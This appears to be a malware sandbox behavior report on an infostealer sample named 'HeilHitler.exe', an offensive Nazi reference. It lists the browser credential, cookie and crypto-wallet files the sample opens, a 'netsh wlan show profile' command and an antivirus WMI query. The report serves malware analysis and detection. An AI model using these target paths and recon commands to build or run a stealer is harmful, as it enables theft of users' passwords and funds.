Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cs VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\eu VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fa VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hr VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ja VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ko VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\si VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sk VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sl VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sw VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\tr VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\uk VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ur VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ml VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mn VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mr VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\my VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ne VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\vi VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\nl VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pt_PT VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_TW VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zu VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata VolumeInformation
Source: C:\Users\user\Desktop\HeilHitler.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\tree.com Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D6D010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF633D6D010
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D85C00 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF633D85C00
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C448CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,68_2_00007FF702C448CC
              Source: C:\Users\user\Desktop\HeilHitler.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Lowering of HIPS / PFW / Operating System Security Settings

              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

              Stealing of Sensitive Information

              Source: Yara match | File source: 00000000.00000003.1680543056.0000028B92082000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000003.1680543056.0000028B92084000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000002.2024405519.000001BD43030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000003.2017807345.000001BD43E2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: HeilHitler.exe PID: 7432, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: HeilHitler.exe PID: 7448, type: MEMORYSTR
              Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\_MEI74322\rarreg.key, type: DROPPED
              Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: Electrum
              Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: com.liberty.jaxx
              Source: HeilHitler.exe, 00000001.00000002.2031684377.000001BD43B30000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: sers\user\AppData\Roaming\Exodus\exodus.wallet
              Source: HeilHitler.exe, 00000001.00000002.2031684377.000001BD43B30000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: sers\user\AppData\Roaming\Ethereum\keystoredata
              Source: HeilHitler.exe, 00000001.00000002.2031684377.000001BD43B30000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: sers\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb
